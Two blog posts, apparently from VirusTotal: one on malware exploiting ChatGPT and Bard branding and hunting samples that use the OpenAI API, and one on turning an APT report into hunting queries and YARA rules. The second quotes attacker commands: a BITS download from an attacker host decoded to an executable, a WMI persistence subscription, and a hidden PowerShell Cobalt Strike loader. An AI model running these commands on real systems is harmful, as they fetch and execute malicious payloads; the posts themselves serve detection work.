Wednesday, November 29, 2023

How AI is shaping malware analysis

We just released our “Empowering Defenders: How AI is shaping malware analysis” report, in which we share VirusTotal’s visibility to help researchers, security practitioners and the general public better understand the nature of malicious attacks. This time we focus on how AI complements traditional malware analysis tools with new functionality, leading to significant time savings for analysts. Here are some of the main ideas presented:

  • AI offers a different angle on malware detection, from a binary verdict to a detailed explanation.

  • AI excels in identifying malicious scripts, particularly obfuscated ones, achieving up to 70% better detection rates compared to traditional methods alone.

  • AI proved to be a powerful tool for detection and analysis of malicious scripting tool sets traditionally overlooked by security products. 

  • AI demonstrates enhanced detection and identification of scripts exploiting vulnerabilities, with an improvement on exploit identification of up to 300% over traditional tools alone.

  • We observed suspicious samples using AI APIs or leveraging enthusiasm for AI products for distribution. However, AI usage in APT-like attacks cannot be confirmed at this time.



For full details, you can download the report here


The question most asked of VirusTotal since AI became more mainstream is “have you found any AI generated malware”. Detecting if any malware was “AI generated” is a challenging task. How does one trace where any source code comes from? We played with different ideas, trying to find unusual patterns in malware families and actors for the last 12 to 15 months. Through all of our research, we didn’t see any strong indicators. 

In this blog post we provide additional technical details for the AI-generated malware section of our report.


Impersonation Tactics in the Age of AI

As the popularity of certain applications and services grows, cybercriminals capitalize on this trend by impersonating them to infect unsuspecting victims. We observed different campaigns abusing ChatGPT and Google Bard iconography, file name and metadata for distribution. Despite ChatGPT's official launch in November 2022 and Google Bard's in February 2023, it wasn't until early 2023 that distinct patterns and spikes in malware exploiting their reputations emerged, highlighting the evolving tactics of cybercriminals in leveraging popular trends.


Infostealers are the primary type of malware we've observed exploiting the reputations of ChatGPT and Google Bard. Families like Redline, Vidar, Raccoon, and Agent Tesla are among the most prevalent examples we've encountered. In addition, we found an extended list of Remote Access Trojan (RAT) families mimicking these applications, including DCRat, NjRAT, CreStealer, AsyncRAT, Lummac, RevengeRAT, Spymax, Aurora Stealer, Spynote, Warzone and OrcusRAT.

After Windows executables, the second most popular sample type is Android:



As an example of infection vector, we found Redline samples deployed through a .bat file distributed inside a .zip bundling a document called "GPT CHAT INSTALLATION INSTRUCTIONS.docx":



Another distribution vector is through the use of ISO images. We found a Vidar sample distributed through "ChatGPT For Dummies 2st Edition.iso".

Other interesting findings include a Bumblebee sample distributed as “ChatGPT_Setup.msi” and a sample (“ChatGPT_0.12.0_windows_x86_64.exe”) that probably uses drivers to escalate privileges. “ChatGPT Complete Guide For Developers Students And Worrkers 2023.exe” also uses Process Explorer drivers to elevate privileges during execution.

Although the most popular infection vector for the samples analyzed is other samples (like droppers or compressed files), we found some of them distributed through legitimate websites, hosting services, web applications, and Discord. We believe the latter is on the verge of discontinuation, as Discord has recently announced a shift in its Content Delivery Network (CDN) approach.

Additionally, we searched for samples communicating with platforms hosting AI models, based on the findings of a Kaspersky blog post in which a sample downloads a potentially malicious model from huggingface.co. You can use the following query to find suspicious samples communicating with this domain.

Suspicious samples using OpenAI’s API


The number of suspicious samples interacting in some way with api.openai.com shows a slowly growing trend, with a peak in August 2023.


To search for files that contact or contain the OpenAI API endpoint you can use the following query:

entity:file p:5+ (embedded_domain:api.openai.com or behaviour_network:api.openai.com)

Another option could be searching for common patterns when using the OpenAI API:

entity:file p:5+ (content:code-davinci or content:text-davinci or content:api.openai.com)


A third option is getting files related to the URL api.openai.com, which includes files that reference this domain and communicating files.
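The first two queries above can also be assembled programmatically, which helps when the same search has to be repeated for other AI-related domains. The following is a minimal sketch; the helper name `build_openai_queries` and its parameters are hypothetical and only reproduce the query strings shown in this post.

```python
def build_openai_queries(domain="api.openai.com", min_positives=5):
    """Return the network-based and content-based VTI queries as strings."""
    prefix = f"entity:file p:{min_positives}+"

    # Files that embed the domain or contact it during sandbox execution.
    network_query = (
        f"{prefix} (embedded_domain:{domain} or behaviour_network:{domain})"
    )

    # Files whose content includes common OpenAI API patterns.
    content_terms = ["code-davinci", "text-davinci", domain]
    content_clause = " or ".join(f"content:{term}" for term in content_terms)
    content_query = f"{prefix} ({content_clause})"

    return network_query, content_query


network_query, content_query = build_openai_queries()
print(network_query)
print(content_query)
```

Either string could then be passed as the 'query' parameter of an '/intelligence/search' request.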


This can be automated to easily discriminate samples based on different criteria, such as detection rate, using VT-PY or VirusTotal’s API. Let’s see an example.

The following code uses the API to get a list of entities communicating with api.openai.com, including referring files:

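import vt

# Placeholder API key. The top-level 'async for' assumes a notebook
# or an enclosing async function.
cli = vt.Client('<your-api-key>')

malware_AI_objects = []
async for mai in cli.iterator(
        '/intelligence/search',
        params={
            'query': 'https://api.openai.com',
            'attributes': '',
            'relationships': 'referrer_files'},
        limit=0):
    malware_AI_objects.append(mai.to_dict())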

We can iterate over the previous query to obtain the list of all related files. The 'malware_AI_objects' variable contains the URLs to get additional details on them:


The following code iterates the previous list of URLs obtaining additional details in the 'last_analysis_stats' field to filter out malicious files.

import pandas as pd

# Keep only the URL objects that have at least one referrer file.
malware_AI_df = pd.DataFrame(
    [{'domain': mai['id'], **mai['relationships']}
     for mai in malware_AI_objects
     if mai['relationships']['referrer_files']['data']])

# Fetch the referrer files of one URL object, requesting only the attributes we need.
malware_AI_hashes = []
async for mai in cli.iterator(
        '/urls/9b1b5eabf33c765585b7f7095d3cd726d73db49f3559376f426935bbd4a22d4b/referrer_files',
        params={'attributes': 'sha256,last_analysis_stats'},
        limit=0):
    malware_AI_hashes.append(mai.to_dict())

Finally, we can filter out results based on the number of AV detections provided in the “malicious” field.

# Keep files flagged as malicious by more than one AV engine.
malware_AI_hashes_DF = pd.DataFrame(
    [{'sha256': mai['id']}
     for mai in malware_AI_hashes
     if mai['attributes']['last_analysis_stats']['malicious'] > 1])
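The same filtering step can be tried offline, without pandas or an API key. The sketch below uses made-up records that only mimic the shape of 'mai.to_dict()'; the function name `filter_by_detections` and the sample ids are hypothetical.

```python
def filter_by_detections(file_objects, min_malicious=2):
    """Return the ids of objects with at least `min_malicious` AV detections."""
    hashes = []
    for obj in file_objects:
        # Objects without stats are treated as having zero detections.
        stats = obj.get("attributes", {}).get("last_analysis_stats", {})
        if stats.get("malicious", 0) >= min_malicious:
            hashes.append(obj["id"])
    return hashes


# Made-up records for illustration only; these are not real samples.
sample_objects = [
    {"id": "hash-a", "attributes": {"last_analysis_stats": {"malicious": 42}}},
    {"id": "hash-b", "attributes": {"last_analysis_stats": {"malicious": 1}}},
    {"id": "hash-c", "attributes": {}},
]

print(filter_by_detections(sample_objects))
```

A threshold of 2 is equivalent to the '> 1' condition used above; raising it trades coverage for fewer false positives.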

We can easily modify this script to obtain the files ('Communicating Files') that interact with the 'api.openai.com' domain.
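One way to make that change is to build the relationship path from the URL itself. The sketch below assumes the unpadded URL-safe Base64 form of a VirusTotal URL identifier and assumes the relationship is named 'communicating_files'; the helper names are hypothetical, so check both assumptions against the API documentation before relying on them.

```python
import base64


def url_identifier(url):
    """Encode a URL as unpadded URL-safe Base64 (assumed identifier form)."""
    return base64.urlsafe_b64encode(url.encode()).decode().rstrip("=")


def relationship_path(url, relationship):
    """Build the API path for one relationship of a URL object."""
    return f"/urls/{url_identifier(url)}/{relationship}"


# 'communicating_files' is assumed from the 'Communicating Files' label above.
path = relationship_path("https://api.openai.com/", "communicating_files")
print(path)
```

The resulting path could replace the hardcoded '/urls/.../referrer_files' string passed to 'cli.iterator'.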


RAT in the chat

As previously mentioned, we found several RAT samples mimicking AI applications (Google Bard, OpenAI ChatGPT). Some DarkComet samples use 'https://api.openai.com/v1/completions', which, according to OpenAI’s documentation, can be used to prompt ChatGPT. This endpoint requires an API key.

One of these samples, with 42 AV detections, included this URL but did not connect to openai.com during sandbox execution, so we took a deeper look.

The first disassembled instructions show the 'krnln.fnr' string and the registry entry "Software\FlySky\E\Install", which refer to EPL (Easy Programming Language). EPL provides functionality similar to Visual Basic. This blog post (@Hexacorn) provides more information on how to analyze these files.

If this framework is installed on the victim's computer, the sample opens a window for the victim to interact with ChatGPT, with a 'How are you?' greeting in Chinese.


This file appears in the resource segment of another PE file. This parent file is a RAT that executes the previous chatbot.



Wrapping it up


The integration of AI engines into VirusTotal has provided a unique opportunity to evaluate their capabilities in real-world scenarios. While the field is still rapidly evolving, AI engines have demonstrated remarkable potential for automating and enhancing various analysis tasks, particularly those that are time-consuming and challenging, such as deobfuscation and interpreting suspicious behavior.

Pinpointing whether malware is AI-generated remains a complex task due to the difficulty of tracing the origins of source code. Instead, we've encountered malware families employing AI themes for distribution, exploiting the current trend of AI-based threats. This opportunistic behavior is unsurprising, given attackers' tendency to capitalize on trending topics. The majority of these disguised samples are trojans targeting Windows systems, followed by Android samples. 

While the integration of OpenAI APIs into certain RATs has been observed, the specific purpose and effectiveness of this integration remain unclear. It appears that RAT operators may be utilizing OpenAI APIs as a distraction tactic rather than leveraging their full potential for advanced malicious activities. Nonetheless, it is imperative to maintain vigilance and closely monitor how the usage of OpenAI APIs in RATs might evolve in the future.

As always, we would like to hear from you.


Happy hunting!

Thursday, November 23, 2023


Actionable Threat Intel (VI) - A day in a Threat Hunter's life

Kaspersky's CTI analysts recently released their Asian APT groups report, including details on behavior by different adversaries. Following our series on making third-party intelligence actionable using VirusTotal Intelligence, we have put on our threat hunter’s hat to find samples and monitor activity based on the report’s details.
Many of the behaviors shared by Kaspersky are based on the use of LOLBAS by attackers once they gain a foothold on the victim. This is an increasing trend among adversaries, which makes it critical for security analysts to understand these binaries’ capabilities.
Let’s start by analyzing the most interesting bits we found in the report.

Start-BitsTransfer

Start-BitsTransfer is a cmdlet that supports the download of multiple files, and it seems to be an alternative for adversaries to the more commonly used bitsadmin.exe binary. The report describes its use in different cases. Here is one example:
PowerShell "Start-BitsTransfer -Source hxxp://security.lomiasecure[.]net/crx/node.txt -Destination C:\\Users\\public\\node.txt -transfertype download"
PowerShell if($InputString = Get-Content 'C:\\users\\public\\node.txt'){ [System.IO.File]::WriteAllBytes('C:\\users\\public\\node.exe', [System.Convert]::FromBase64String($InputString))}
The example uses FromBase64String and WriteAllBytes, so our query will look for either of them using an OR condition, as well as for the presence of the "Start-BitsTransfer" cmdlet in sandbox’s behavior. The following VT intelligence query obtains samples with similar (not identical) behaviors.
behavior_processes:"Start-BitsTransfer -Source" (behavior_processes:"[System.Convert]::FromBase64String" or behavior_processes:"[System.IO.File]::WriteAllBytes")
The query returns 12 suspicious samples. Activity seems to be clustered around October and November 2023. According to OSINT, some of the results are related to APT33 and The Gorgon Group.
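The logic of this query (the cmdlet, plus either of the two .NET calls) can also be applied to command lines collected locally, for example from process creation logs. The following is a minimal sketch; the function name is hypothetical, the lowercase comparison is an assumption of this sketch rather than a statement about how VT Intelligence matches, and the sample strings are simplified stand-ins for the commands in the report.

```python
def matches_bits_download(command_line):
    """True if the command line shows the download-and-decode pattern."""
    text = command_line.lower()
    has_bits = "start-bitstransfer -source" in text
    has_decode = "[system.convert]::frombase64string" in text
    has_write = "[system.io.file]::writeallbytes" in text
    # Same shape as the query: cmdlet AND (decode OR write).
    return has_bits and (has_decode or has_write)


# Simplified, defanged stand-ins for the commands quoted above.
download_only = (
    "PowerShell Start-BitsTransfer -Source "
    "hxxp://security.lomiasecure[.]net/crx/node.txt -Destination node.txt"
)
download_and_decode = (
    download_only
    + " ; [System.IO.File]::WriteAllBytes(out,"
    + " [System.Convert]::FromBase64String(data))"
)

print(matches_bits_download(download_only))
print(matches_bits_download(download_and_decode))
```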

WMI Event Subscription

This technique is used by threat actors during lateral movement, mainly for execution and persistence. To achieve this, the WMI event subscription points to the payload to execute.
instance of __EventFilter {
    EventNamespace = "root\\cimv2";
    Name = "Chrome Update";
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >=240 AND TargetInstance.SystemUpTime < 325";
    QueryLanguage = "WQL";
};
instance of CommandLineEventConsumer {
    ExecutablePath = "C:\\Windows\\System32\\GoogleUpdate.exe";
    Name = "GoogleUpdater";
};
There are different ways to search in VirusTotal for samples with this behavior. In this case, we noticed that the path to the payload is specified with "ExecutablePath" rather than the more common "CommandLineTemplate". When “CommandLineTemplate” is null, the value of “ExecutablePath” is used instead, and the process is then executed by calling the “CreateProcess” API. The following VTI query is based on this finding:
(behavior:"EventNamespace =") (behavior:"Name =") behavior:"QueryLanguage = \"WQL\"" (behavior:"__EventFilter" behavior:"CommandLineEventConsumer") behavior:"ExecutablePath ="
This query returns 41 results, including Konni malware samples and samples attributed to APT37. Confirming our previous assumption, using “CommandLineTemplate =” instead of “ExecutablePath =” returns 1.1k samples.
Please note the use of "behavior" instead of "behavior_processes" in the previous VTI query. The reason is that WMI statements are commonly stored in the "Dataset actions", "Highlighted Text" and "Calls Highlighted" sections under the sample’s behavior: WMI events do not launch new processes, as they are processed by an ETW provider, so the sandbox maps them under “behavior”. Here you can find an example.
Another interesting way to hunt and monitor samples using this technique is through the following crowdsourced sigma rule, which checks for WMI event subscriptions.
sigma_rule:07b95c7eb376ac65a345dc6a2c1cb03732e085818d93bd1ea2e7d3706619d78e
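When triaging MOF text recovered from a sample, it can be useful to check which field a CommandLineEventConsumer uses for its payload, since the rarer "ExecutablePath" form is what the query above keys on. The following sketch is a simple regex-based check, not a MOF parser; the function name is hypothetical, and it prefers "CommandLineTemplate" when both fields are present, following the fallback behavior described in this section.

```python
import re

# Matches either payload field and its double-quoted value.
FIELD = re.compile(
    r'(CommandLineTemplate|ExecutablePath)\s*=\s*"((?:[^"\\]|\\.)*)"'
)


def consumer_payload_field(mof_text):
    """Return (field, value) for the consumer's payload, or None if absent."""
    consumer = re.search(
        r"instance of CommandLineEventConsumer\s*\{(.*?)\}\s*;", mof_text, re.S
    )
    if consumer is None:
        return None
    fields = dict(FIELD.findall(consumer.group(1)))
    for name in ("CommandLineTemplate", "ExecutablePath"):
        if name in fields:
            return name, fields[name]
    return None


# The consumer from the example above, kept as raw MOF text.
mof = (
    r'instance of CommandLineEventConsumer { ExecutablePath = '
    r'"C:\\Windows\\System32\\GoogleUpdate.exe"; Name = "GoogleUpdater"; };'
)
print(consumer_payload_field(mof))
```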

PowerShell capabilities

Not surprisingly, PowerShell is one of the most used scripting languages by attackers. In particular, the following code injects Cobalt Strike in binary form into memory.
C:\Windows\system32\cmd.exe /b /c start /b /min PowerShell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+ '\sysnative\WindowsPowerShell\v1.0\PowerShell.exe'}else{$b='PowerShell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAIKCBWACA7VWa2+ bSBT9nEj5D6iyZFAcP5I0bSJVWsY2McR2jYlxbK+1IjDA1MMjMDgm3f73vYMhTbdp.... '))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))'; $s.UseShellExecute=$false;$s.RedirectStandardOutput=$true; $s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
From the previous PowerShell, it is possible to create a query to detect patterns using the same memory injection technique. The resulting samples seem to mostly use it to inject Metasploit.
behavior_processes:"{$b='PowerShell.exe'}" behavior_processes:"-nop -w hidden -noni -c" behavior_processes:"{$b=$env:windir+"
Half of the results from the previous query correspond to Metasploit samples, mainly “.bat” scripts that execute “cmd.exe” to launch PowerShell and finally load the payload into memory in binary form.
41 out of 44 results are identified by the same sigma rule, “Powershell Decrypt And Execute Base64 Data”, created by Joe Security. We can search for additional samples identified by this crowdsourced rule with the following VTI query.
sigma_rule:d77da6b7c1a6f6530b4eb82ca84407ff02947b235ab29c94eade944c4f51e499
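The loader quoted in this section wraps its second stage in Base64 and gzip (the 'H4sI' prefix is what a gzip header looks like once Base64-encoded). For static analysis, the same two steps can be undone in Python. The following is a minimal sketch with a hypothetical function name; it is exercised on a harmless stand-in string because the payload in the report is truncated.

```python
import base64
import gzip


def decode_gzip_base64(blob):
    """Base64-decode and gunzip a payload string, returning the script text."""
    # Drop whitespace that copy/paste or PDF extraction may have introduced.
    compressed = base64.b64decode("".join(blob.split()))
    return gzip.decompress(compressed).decode("utf-8", errors="replace")


# Harmless stand-in payload, built the same way the loader expects it.
stand_in = base64.b64encode(gzip.compress(b"Write-Output 'hello'")).decode()
print(decode_gzip_base64(stand_in))
```

The decoded text should only be inspected, never executed, outside an isolated analysis environment.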

Automate your queries 🚀

The previous examples show how a CTI team could consume tactical intelligence for hunting. Once the efficacy of the VTI queries has been assessed, it's time to convert them into VT Livehunt rules to automatically monitor any suspicious future activity. VTI queries can be easily translated into YARA rules, used by Livehunt, thanks to the “vt” module. Let’s see how.
Start-BitsTransfer
The Livehunt YARA rule resulting from our previous VTI query will automatically monitor and notify us of any new samples using the Start-BitsTransfer cmdlet technique previously discussed. This is usually used either through a script or directly on the command line interpreter.
In our YARA rule, we use different fields like “terminated processes”, “executed commands” or “created processes” to look for the use of “Start-BitsTransfer”. Then we search in processes created, terminated and command executions for traces of the “FromBase64” and “System.IO.File” strings, also needed for this technique. Finally, we added the “new file” modifier at the beginning to receive notifications only for new uploads.
🚀 Check out the rule on our GitHub
WMI Event Subscription
For this rule, we split the condition into two blocks. The first one searches for the patterns we used in our VTI query in “processes created”, “terminated” and “commands executed” during detonation. The second block searches for the same strings in a different set of fields, in this case “highlighted calls”, “highlighted text”, and “system property lookups” given WMI execution is also (although, more rarely) stored in these fields, as previously discussed.
🚀 Check out the rule on our GitHub
PowerShell capabilities
This rule, like the previous ones, searches for patterns in “processes created”, “terminated” and “commands executed”. In addition, it searches telemetry generated by sigma rule matches, a powerful feature that is often overlooked. In this case, it will search for Windows XML EventLog (EVTX) events generated by our sandboxes containing the same pattern we searched for in “behavior”.
🚀 Check out the rule on our GitHub

Wrapping up

Building VT Intelligence queries from third-party intelligence publications is one of the most common tasks for CTI teams, allowing better understanding and calibration of a malicious campaign, as well as threat hunting and monitoring. Queries based on TTPs can be easily generated thanks to all the details resulting from VirusTotal’s sandbox detonation. Once the query is polished and we are happy with the results, it can quickly be converted into a YARA Livehunt rule to automate the identification of new samples and monitor the evolution of the given campaign.
The process illustrated in this blog post can be used by any CTI, Threat Hunting, or even Detection Engineering team to leverage external low-level tactical information for hunting, better understand the campaigns and malware involved, identify threat actors, estimate the number of samples, detections and timeline, monitor a campaign’s evolution, extract IOCs for proactive protection, and develop rules for internal detection.
As usual, we are happy to hear from you!
Happy hunting!